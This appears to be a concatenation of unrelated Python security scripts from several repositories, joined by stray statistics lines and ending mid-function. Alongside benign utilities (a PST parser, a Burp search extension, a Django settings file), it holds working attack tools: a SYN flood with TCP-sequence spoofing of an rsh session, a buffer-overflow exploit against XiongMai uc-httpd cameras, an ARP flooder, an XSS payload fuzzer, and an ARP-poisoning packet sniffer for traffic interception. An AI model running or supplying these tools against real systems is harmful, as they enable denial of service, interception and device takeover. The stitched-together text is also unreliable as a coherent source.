print colorama.Fore.RESET + '[+]', msg
self.log.info(msg)
for f in self.files:
try:
data, headers = function(f)
self.results['data'].append(data)
self.results['headers'] = headers
except TypeError:
self.log.error('Issue processing {}. Skipping...'.format(f))
continue
msg = 'Plugin {} completed at {}'.format(self.plugin, datetime.now().strftime('%m/%d/%Y %H:%M:%S'))
print colorama.Fore.GREEN + '[*]', msg
self.log.info(msg)
def write(self, output, **kwargs):
msg = 'Writing results of {} plugin'.format(self.plugin)
print colorama.Fore.RESET + '[+]', msg
self.log.info(msg)
if not os.path.exists(output):
os.makedirs(output)
if 'excel' in kwargs.keys():
Framework.Writer(writers.xlsx_writer.writer, output, self.plugin + '.xlsx', self.results['headers'],
self.results['data'], **kwargs)
else:
Framework.Writer(writers.csv_writer.writer, output, self.plugin + '.csv', self.results['headers'],
self.results['data'], **kwargs)
if self.plugin == 'exif_metadata':
Framework.Writer(writers.kml_writer.writer, output, '', self.plugin + '.kml', self.results['data'])
class Writer(object):
def __init__(self, writer, output, name, header, data, **kwargs):
self.writer = writer
self.output = os.path.join(output, name)
self.header = header
self.data = data
self.recursion = None
if 'recursion' in kwargs.keys():
self.recursion = kwargs['recursion']
self.run()
def run(self):
if self.recursion:
self.writer(self.output, self.header, self.data, recursion=self.recursion)
else:
self.writer(self.output, self.header, self.data)
if __name__ == '__main__':
parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('INPUT_DIR', help='Base directory to process.')
parser.add_argument('OUTPUT_DIR', help='Output directory.')
parser.add_argument('-x', help='Excel output (Default CSV)', action='store_true')
parser.add_argument('-l', help='File path and name of log file.')
args = parser.parse_args()
if os.path.isfile(args.INPUT_DIR) or os.path.isfile(args.OUTPUT_DIR):
msg = 'Input and Output arguments must be directories.'
print colorama.Fore.RED + '[-]', msg
sys.exit(1)
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l) # create log directory path
log_path = os.path.join(args.l, 'framework.log')
else:
log_path = 'framework.log'
framework = Framework(args.INPUT_DIR, args.OUTPUT_DIR, log_path, excel=args.x)
framework.run()
| 40.521186 | 116 | 0.56287 |
cybersecurity-penetration-testing | import pypff
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts handles processing and output of PST Email Containers'
def main(pst_file):
"""
The main function opens a PST and calls functions to parse and report data from the PST
:param pst_file: A string representing the path to the PST file to analyze
:param report_name: Name of the report title (if supplied by the user)
:return: None
"""
opst = pypff.open(pst_file)
root = opst.get_root_folder()
message_data = folder_traverse(root, [], **{'pst_name': pst_file, 'folder_name': 'root'})
header = ['pst_name', 'folder_name', 'creation_time', 'submit_time', 'delivery_time',
'sender', 'subject', 'attachment_count']
return message_data, header
def folder_traverse(base, message_data, pst_name, folder_name):
"""
The folderTraverse function walks through the base of the folder and scans for sub-folders and messages
:param base: Base folder to scan for new items within the folder.
:param message_data: A list of data for output
:param pst_name: A string representing the name of the pst file
:param folder_name: A string representing the name of the folder
:return: None
"""
for folder in base.sub_folders:
if folder.number_of_sub_folders:
message_data = folder_traverse(folder, message_data, pst_name, folder.name)
message_data = check_for_messages(folder, message_data, pst_name, folder.name)
return message_data
def check_for_messages(folder, message_data, pst_name, folder_name):
"""
The checkForMessages function reads folder messages if present and passes them to the report function
:param folder: pypff.Folder object
:param message_data: list to pass and extend with message info
:param pst_name: A string representing the name of the pst file
:param folder_name: A string representing the name of the folder
:return: Dictionary of results by folder
"""
for message in folder.sub_messages:
message_dict = process_message(message)
message_dict['pst_name'] = pst_name
message_dict['folder_name'] = folder_name
message_data.append(message_dict)
return message_data
def process_message(message):
"""
The processMessage function processes multi-field messages to simplify collection of information
:param message: The pypff.Message object
:return: A dictionary with message fields (values) and their data (keys)
"""
return {
"subject": message.subject,
"sender": message.sender_name,
"header": message.transport_headers,
"body": message.plain_text_body,
"creation_time": message.creation_time,
"submit_time": message.client_submit_time,
"delivery_time": message.delivery_time,
"attachment_count": message.number_of_attachments,
}
| 37.921053 | 107 | 0.683125 |
cybersecurity-penetration-testing | from burp import IBurpExtender
from burp import IContextMenuFactory
from javax.swing import JMenuItem
from java.util import List, ArrayList
from java.net import URL
import socket
import urllib
import json
import re
import base64
bing_api_key = "YOURKEYHERE"
class BurpExtender(IBurpExtender, IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self.context = None
# we set up our extension
callbacks.setExtensionName("BHP Bing")
callbacks.registerContextMenuFactory(self)
return
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Send to Bing", actionPerformed=self.bing_menu))
return menu_list
def bing_menu(self,event):
# grab the details of what the user clicked
http_traffic = self.context.getSelectedMessages()
print "%d requests highlighted" % len(http_traffic)
for traffic in http_traffic:
http_service = traffic.getHttpService()
host = http_service.getHost()
print "User selected host: %s" % host
self.bing_search(host)
return
def bing_search(self,host):
# check if we have an IP or hostname
is_ip = re.match("[0-9]+(?:\.[0-9]+){3}", host)
if is_ip:
ip_address = host
domain = False
else:
ip_address = socket.gethostbyname(host)
domain = True
bing_query_string = "'ip:%s'" % ip_address
self.bing_query(bing_query_string)
if domain:
bing_query_string = "'domain:%s'" % host
self.bing_query(bing_query_string)
def bing_query(self,bing_query_string):
print "Performing Bing search: %s" % bing_query_string
# encode our query
quoted_query = urllib.quote(bing_query_string)
http_request = "GET https://api.datamarket.azure.com/Bing/Search/Web?$format=json&$top=20&Query=%s HTTP/1.1\r\n" % quoted_query
http_request += "Host: api.datamarket.azure.com\r\n"
http_request += "Connection: close\r\n"
http_request += "Authorization: Basic %s\r\n" % base64.b64encode(":%s" % bing_api_key)
http_request += "User-Agent: Blackhat Python\r\n\r\n"
json_body = self._callbacks.makeHttpRequest("api.datamarket.azure.com",443,True,http_request).tostring()
json_body = json_body.split("\r\n\r\n",1)[1]
try:
r = json.loads(json_body)
if len(r["d"]["results"]):
for site in r["d"]["results"]:
print "*" * 100
print site['Title']
print site['Url']
print site['Description']
print "*" * 100
j_url = URL(site['Url'])
if not self._callbacks.isInScope(j_url):
print "Adding to Burp scope"
self._callbacks.includeInScope(j_url)
except:
print "No results from Bing"
pass
return
| 25.491228 | 136 | 0.620073 |
owtf | """
Plugin for manual/external CORS testing
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "CORS Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalCORS")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 24.714286 | 75 | 0.766017 |
cybersecurity-penetration-testing | class Solution(object):
# def findShortestSubArray(self, nums):
# """
# :type nums: List[int]
# :rtype: int
# """
# res = len(nums)
# counter = collections.Counter()
# for num in nums:
# counter[num] += 1
# degree = max(counter.values())
# for key, kdegree in counter.most_common():
# if degree != kdegree:
# break
# res = min(res, self.smallestSubArray(nums, key, degree))
# return res
# def smallestSubArray(self, nums, key, degree):
# start = nums.index(key)
# pos = start + 1
# degree -= 1
# while pos < len(nums) and degree != 0:
# if nums[pos] == key:
# degree -= 1
# pos += 1
# return pos - start
def findShortestSubArray(self, nums):
left, right, count = {}, {}, {}
for i, x in enumerate(nums):
if x not in left: left[x] = i
right[x] = i
count[x] = count.get(x, 0) + 1
ans = len(nums)
degree = max(count.values())
for x in count:
if count[x] == degree:
ans = min(ans, right[x] - left[x] + 1)
return ans
| 28.809524 | 70 | 0.46283 |
cybersecurity-penetration-testing | import random
number1 = random.randint(1, 10)
number2 = random.randint(1, 10)
print('What is ' + str(number1) + ' + ' + str(number2) + '?')
answer = input('> ')
if answer == number1 + number2:
print('Correct!')
else:
print('Nope! The answer is ' + str(number1 + number2)) | 31 | 62 | 0.609756 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
num = int(raw_input("Enter the number of packets "))
interface = raw_input("Enter the Interface ")
arp_pkt=ARP(pdst='192.168.1.255',hwdst="ff:ff:ff:ff:ff:ff")
eth_pkt = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")
try:
sendp(eth_pkt/arp_pkt,iface=interface,count =num, inter= .001)
except :
print "Destination Unreachable "
| 22.933333 | 63 | 0.692737 |
Python-Penetration-Testing-for-Developers | import shodan
import requests
SHODAN_API_KEY = "{Insert your Shodan API key}"
api = shodan.Shodan(SHODAN_API_KEY)
target = 'www.packtpub.com'
dnsResolve = 'https://api.shodan.io/dns/resolve?hostnames=' + target + '&key=' + SHODAN_API_KEY
try:
# First we need to resolve our targets domain to an IP
resolved = requests.get(dnsResolve)
hostIP = resolved.json()[target]
# Then we need to do a Shodan search on that IP
host = api.host(hostIP)
print "IP: %s" % host['ip_str']
print "Organization: %s" % host.get('org', 'n/a')
print "Operating System: %s" % host.get('os', 'n/a')
# Print all banners
for item in host['data']:
print "Port: %s" % item['port']
print "Banner: %s" % item['data']
# Print vuln information
for item in host['vulns']:
CVE = item.replace('!','')
print 'Vulns: %s' % item
exploits = api.exploits.search(CVE)
for item in exploits['matches']:
if item.get('cve')[0] == CVE:
print item.get('description')
except:
'An error occured'
| 25.780488 | 95 | 0.592525 |
Python-for-Offensive-PenTest | import ctypes
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
print '[-] We are NOT admin! '
else:
print '[+] We are admin :) '
| 14.888889 | 46 | 0.591549 |
cybersecurity-penetration-testing | import optparse
from scapy.all import *
def synFlood(src, tgt):
for sport in range(1024,65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
for x in range(1, 5):
if preNum != 0:
preNum = seqNum
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seqNum = ans.getlayer(TCP).seq
diffSeq = seqNum - preNum
print '[+] TCP Seq Difference: ' + str(diffSeq)
return seqNum + diffSeq
def spoofConn(src, tgt, ack):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514)
synPkt = IPlayer / TCPlayer
send(synPkt)
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514, ack=ack)
ackPkt = IPlayer / TCPlayer
send(ackPkt)
def main():
parser = optparse.OptionParser('usage %prog '+\
'-s <src for SYN Flood> -S <src for spoofed connection> '+\
'-t <target address>')
parser.add_option('-s', dest='synSpoof', type='string',\
help='specifc src for SYN Flood')
parser.add_option('-S', dest='srcSpoof', type='string',\
help='specify src for spoofed connection')
parser.add_option('-t', dest='tgt', type='string',\
help='specify target address')
(options, args) = parser.parse_args()
if options.synSpoof == None or options.srcSpoof == None \
or options.tgt == None:
print parser.usage
exit(0)
else:
synSpoof = options.synSpoof
srcSpoof = options.srcSpoof
tgt = options.tgt
print '[+] Starting SYN Flood to suppress remote server.'
synFlood(synSpoof, srcSpoof)
print '[+] Calculating correct TCP Sequence Number.'
seqNum = calTSN(tgt) + 1
print '[+] Spoofing Connection.'
spoofConn(srcSpoof, tgt, seqNum)
print '[+] Done.'
if __name__ == '__main__':
main()
| 26.013699 | 65 | 0.595637 |
PenetrationTestingScripts | """
Django settings for scandere project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(y8wl*cko@#9t-1alnz8w_4dssksqd#we0q2w0xw&w3erqdz(q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
LOGIN_REDIRECT_URL = '/'
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'nmaper.apps.NmaperConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'scandere.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [''],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'scandere.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'scandere.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| 25.414634 | 91 | 0.692118 |
Hands-On-Penetration-Testing-with-Python | import socket
import sys
payload="A" * 85
print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <Host>\n"
sys.exit()
print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
s.send('POST /Login.htm HTTP/1.1\r\n')
s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
s.recv(1024)
s.close()
print "\nExploit complete!"
| 23.909091 | 69 | 0.605119 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: banner_grabber.py
Purpose: A script that grabs the banner of exposed services.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import socket
def main():
ports = [21,23,22]
ips = "192.168.195."
for octet in range(0,255):
for port in ports:
ip = ips + str(octet)
#print("[*] Testing port %s at IP %s") % (port, ip)
try:
socket.setdefaulttimeout(1)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))
output = s.recv(1024)
print("[+] The banner: %s for IP: %s at Port: %s") % (output,ip,port)
except:
print("[-] Failed to Connect to %s:%s") % (ip, port)
finally:
s.close()
if __name__ == "__main__":
main()
| 43.442308 | 89 | 0.696537 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via w3af
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via w3af"
def run(PluginInfo):
resource = get_resources("W3AF_Unauth")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 34.785714 | 98 | 0.772 |
cybersecurity-penetration-testing | import xlsxwriter
from datetime import datetime
school_data = [['Department', 'Students', 'Cumulative GPA', 'Final Date'],
['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]
def writeXLSX(data):
workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
main_sheet = workbook.add_worksheet('MySheet')
date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
for i, entry in enumerate(data):
if i == 0:
main_sheet.write(i, 0, entry[0])
main_sheet.write(i, 1, entry[1])
main_sheet.write(i, 2, entry[2])
main_sheet.write(i, 3, entry[3])
else:
main_sheet.write(i, 0, entry[0])
main_sheet.write_number(i, 1, entry[1])
main_sheet.write_number(i, 2, entry[2])
main_sheet.write_datetime(i, 3, entry[3], date_format)
workbook.close()
writeXLSX(school_data)
| 34.151515 | 83 | 0.566005 |
Python-Penetration-Testing-for-Developers | import requests
import sys
from bs4 import BeautifulSoup, SoupStrainer
url = "http://127.0.0.1/xss/medium/guestbook2.php"
url2 = "http://127.0.0.1/xss/medium/addguestbook2.php"
url3 = "http://127.0.0.1/xss/medium/viewguestbook2.php"
f = open("/home/cam/Downloads/fuzzdb-1.09/attack-payloads/all-attacks/interesting-metacharacters.txt")
o = open("results.txt", 'a')
d = {}
sets = []
print "Fuzzing begins!"
initial = requests.get(url)
for payload in f.readlines():
for field in BeautifulSoup(initial.text, parse_only=SoupStrainer('input')):
if field.has_attr('name'):
if field['name'].lower() == "submit":
d[field['name']] = "submit"
else:
d[field['name']] = payload
sets.append(d)
req = requests.post(url2, data=d)
response = requests.get(url3)
o.write("Payload: "+ payload +"\r\n")
o.write(response.text+"\r\n")
d = {}
print "Fuzzing has ended" | 26.636364 | 103 | 0.655324 |
Python-Penetration-Testing-for-Developers | import requests
req = requests.get('http://google.com')
headers = ['Server', 'Date', 'Via', 'X-Powered-By']
for header in headers:
try:
result = req.headers[header]
print '%s: %s' % (header, result)
except Exception, error:
pass | 22.272727 | 51 | 0.615686 |
cybersecurity-penetration-testing | import sys
import socket
import threading
# this is a pretty hex dumping function directly taken from
# http://code.activestate.com/recipes/142812-hex-dumper/
def hexdump(src, length=16):
result = []
digits = 4 if isinstance(src, unicode) else 2
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text) )
print b'\n'.join(result)
def receive_from(connection):
buffer = ""
# We set a 2 second time out depending on your
# target this may need to be adjusted
connection.settimeout(2)
try:
# keep reading into the buffer until there's no more data
# or we time out
while True:
data = connection.recv(4096)
if not data:
break
buffer += data
except:
pass
return buffer
# modify any requests destined for the remote host
def request_handler(buffer):
# perform packet modifications
return buffer
# modify any responses destined for the local host
def response_handler(buffer):
# perform packet modifications
return buffer
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
# connect to the remote host
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host,remote_port))
# receive data from the remote end if necessary
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
# send it to our response handler
remote_buffer = response_handler(remote_buffer)
# if we have data to send to our local client send it
if len(remote_buffer):
print "[<==] Sending %d bytes to localhost." % len(remote_buffer)
client_socket.send(remote_buffer)
# now let's loop and reading from local, send to remote, send to local
# rinse wash repeat
while True:
# read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
print "[==>] Received %d bytes from localhost." % len(local_buffer)
hexdump(local_buffer)
# send it to our request handler
local_buffer = request_handler(local_buffer)
# send off the data to the remote host
remote_socket.send(local_buffer)
print "[==>] Sent to remote."
# receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print "[<==] Received %d bytes from remote." % len(remote_buffer)
hexdump(remote_buffer)
# send to our response handler
remote_buffer = response_handler(remote_buffer)
# send the response to the local socket
client_socket.send(remote_buffer)
print "[<==] Sent to localhost."
# if no more data on either side close the connections
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print "[*] No more data. Closing connections."
break
def server_loop(local_host,local_port,remote_host,remote_port,receive_first):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind((local_host,local_port))
except:
print "[!!] Failed to listen on %s:%d" % (local_host,local_port)
print "[!!] Check for other listening sockets or correct permissions."
sys.exit(0)
print "[*] Listening on %s:%d" % (local_host,local_port)
server.listen(5)
while True:
client_socket, addr = server.accept()
# print out the local connection information
print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])
# start a thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,remote_host,remote_port,receive_first))
proxy_thread.start()
def main():
# no fancy command line parsing here
if len(sys.argv[1:]) != 5:
print "Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]"
print "Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True"
sys.exit(0)
# setup local listening parameters
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
# this tells our proxy to connect and receive data
# before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
# now spin up our listening socket
server_loop(local_host,local_port,remote_host,remote_port,receive_first)
main()
| 29.178771 | 128 | 0.581004 |
Ethical-Hacking-Scripts | import socket, binascii, struct, os, sys, time, threading
from optparse import OptionParser
from scapy.all import *
class OptionParse:
def __init__(self):
self.arg_parse()
def logo(self):
print("""\033[0;31;40m
_____ _ _ _____ _ __ __ __ ___
/ ____| (_) | |/ ____| (_)/ _|/ _| /_ | / _ \
| (___ __ _ _ _ _ __| | (___ _ __ _| |_| |_ ___ _ __ __ _| || | | |
\___ \ / _` | | | | |/ _` |\___ \| '_ \| | _| _/ _ \ '__| \ \ / / || | | |
____) | (_| | |_| | | (_| |____) | | | | | | | || __/ | \ V /| || |_| |
|_____/ \__, |\__,_|_|\__,_|_____/|_| |_|_|_| |_| \___|_| \_/ |_(_)___/
| |
|_|
Packet-Sniffing Script by DrSquid""")
def usage(self):
self.logo()
print("""
[+] Option Parsing Help:
[+] -t, --translate - Script translate any incoming traffic and displays it in the output.
[+] -r, --raw - Script displays raw network traffic in output.
[+] -l, --log - Script Logs Network Traffic headers.
[+] -i, --info - Shows this message.
[+] -p, --poison - ARP Poisons a specified IP.
[+] -a, --address - Only Display Traffic from the provided IP Address.
[+] Usage:
[+] python3 SquidSniffer.py -t -r
[+] python3 SquidSniffer.py -t -a <ipaddress> -p <ipaddress>
[+] python3 SquidSniffer.py -i
""")
def arg_parse(self):
args = OptionParser()
args.add_option("-t","--translate", action="store_true", dest="translate")
args.add_option("-r","--raw",action="store_true",dest="raw")
args.add_option("-i","--info",action="store_true",dest="info")
args.add_option("-l", "--log", action="store_true", dest="log")
args.add_option("-p", "--poison", dest="poisontarget")
args.add_option("-a", "--address", dest="address")
opt,arg = args.parse_args()
if opt.info is not None:
self.usage()
sys.exit()
else:
pass
if opt.poisontarget is not None:
poison = opt.poisontarget
else:
poison = None
if opt.address is not None:
address = opt.address
else:
address = None
if opt.translate is not None:
translate = True
else:
translate = False
if opt.log is not None:
log = True
else:
log = False
if opt.raw is not None:
raw = True
else:
raw = False
self.logo()
sniffer = PacketSniffer(translate, raw, log, poison, address)
print("[+] Preparing to recieve packets......\n")
time.sleep(5)
sniffing = threading.Thread(target=sniffer.sniffing)
sniffing.start()
class ARP_Poisoner:
def __init__(self, targ_ip, gate_ip):
self.targ_ip = targ_ip
self.gate_ip = gate_ip
def obtain_macaddress(self, ip):
arpbroadcast = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip)
recv = srp(arpbroadcast, timeout=2, verbose=False)
return recv[0][0][1].hwsrc
def send_arp_pkt(self, targetip, targetmac, sourceip):
packet = ARP(op=2, pdst=targetip, psrc=sourceip, hwdst=targetmac)
send(packet, verbose=False)
def restore_arp(self, targetip, targetmac, sourceip, sourcemac):
packet = ARP(op=2, hwsrc=sourcemac, psrc=sourceip, hwdst=targetmac, pdst=targetip)
send(packet, verbose=False)
print(f"[+] ARP Table Restored For: {targetip}")
def arp_poison(self):
try:
self.gate_mac = self.obtain_macaddress(self.gate_ip)
print(f"[+] Gateway MAC: {self.gate_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.gate_ip}")
sys.exit()
try:
self.targ_mac = self.obtain_macaddress(self.targ_ip)
print(f"[+] Target MAC: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address for {self.targ_ip}")
sys.exit()
print("\n[+] Sending ARP-Poisoning Packets to Targets\n[+] Do CTRL+C To Stop Arp Poisoning.\n")
while True:
try:
self.send_arp_pkt(self.targ_ip, self.targ_mac, self.gate_ip)
self.send_arp_pkt(self.gate_ip, self.gate_mac, self.targ_ip)
except:
self.restore_arp(self.gate_ip, self.gate_mac, self.targ_ip, self.targ_mac)
self.restore_arp(self.targ_ip, self.targ_mac, self.gate_ip, self.gate_mac)
break
class PacketSniffer:
def __init__(self, translate=False, raw=False, log=False, poison=None, address=None):
self.os = os.name
self.poison = poison
self.logger = bool(log)
self.translat = bool(translate)
self.address = address
self.raw = bool(raw)
self.hastarget = False
if self.address is not None:
try:
self.hastarget = True
self.targ_mac = ARP_Poisoner.obtain_macaddress(None, self.address)
print(f"[+] Obtained MAC Address of {self.address}: {self.targ_mac}")
except:
print(f"[+] Unable to Obtain MAC Address of {self.address}.")
print("[+] Check you arguements.")
sys.exit()
self.translationfile = ['ÿ ff', 'a 61', 'b 62', 'c 63', 'd 64', 'e 65', 'f 66', 'g 67', 'h 68', 'i 69', 'j 6a', 'k 6b', 'l 6c', 'm 6d', 'n 6e', 'o 6f', 'p 70', 'q 71', 'r 72', 's 73', 't 74', 'u 75', 'v 76', 'w 77', 'x 78', 'y 79', 'z 7a', 'A 41', 'B 42', 'C 43', 'D 44', 'E 45', 'F 46', 'G 47', 'H 48', 'I 49', 'J 4a', 'K 4b', 'L 4c', 'M 4d', 'N 4e', 'O 4f', 'P 50', 'Q 51', 'R 52', 'S 53', 'T 54', 'U 55', 'V 56', 'W 57', 'X 58', 'Y 59', 'Z 5a', '0 30', '1 31', '2 32', '3 33', '4 34', '5 35', '6 36', '7 37', '8 38', '9 39', 'ˆ 88', '. 00', 'þ fe', '¶ b6', 'ž 9e', 'Ñ d1', 'Ë cb', '@ 40', ': 3a',"' 27",'" 22', "/ 2f", '\\ 5c', '$ 24', '% 25', '^ 5e', '& 26', '* 2a', '( 28', ') 29', '[ 5b', '] 5d', '{ 7b', '} 7d', 'ù f9', '© a9', 'À c0', 'ª aa', '¾ be', 'Û db', 'Ç c7']
self.logfile = "captured_traffic.txt"
print(f"[+] All Traffic Will be Logged.\n[+] Log File: {self.logfile}")
if self.poison is not None:
self.arp_poison = ARP_Poisoner(self.poison, "192.168.0.1")
self.arp_poisoner = threading.Thread(target=self.arp_poison.arp_poison)
self.arp_poisoner.start()
if self.os == "nt":
try:
self.sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
self.sniffer.bind((socket.gethostbyname(socket.gethostname()), 0))
self.sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
self.sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
except:
print("[+] Error with binding socket.")
print("[+] Run this script as admin!")
sys.exit()
else:
self.sniffer = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
def eth_header(self, data):
storeobj = data
storeobj = struct.unpack("!6s6sH", storeobj)
destination_mac = binascii.hexlify(storeobj[0])
source_mac = binascii.hexlify(storeobj[1])
eth_protocol = storeobj[2]
dest_mac = ""
src_mac = ""
try:
item = 0
for i in source_mac.decode():
src_mac += i
item += 1
if item == 2:
item = 0
src_mac += ":"
item = 0
for i in destination_mac.decode():
dest_mac += i
item += 1
if item == 2:
item = 0
dest_mac += ":"
except:
pass
data = {"Source Mac": src_mac,
"Destination Mac": dest_mac,
"Protocol": eth_protocol}
return data
def ip_header(self, data):
storeobj = struct.unpack("!BBHHHBBH4s4s", data)
version = storeobj[0]
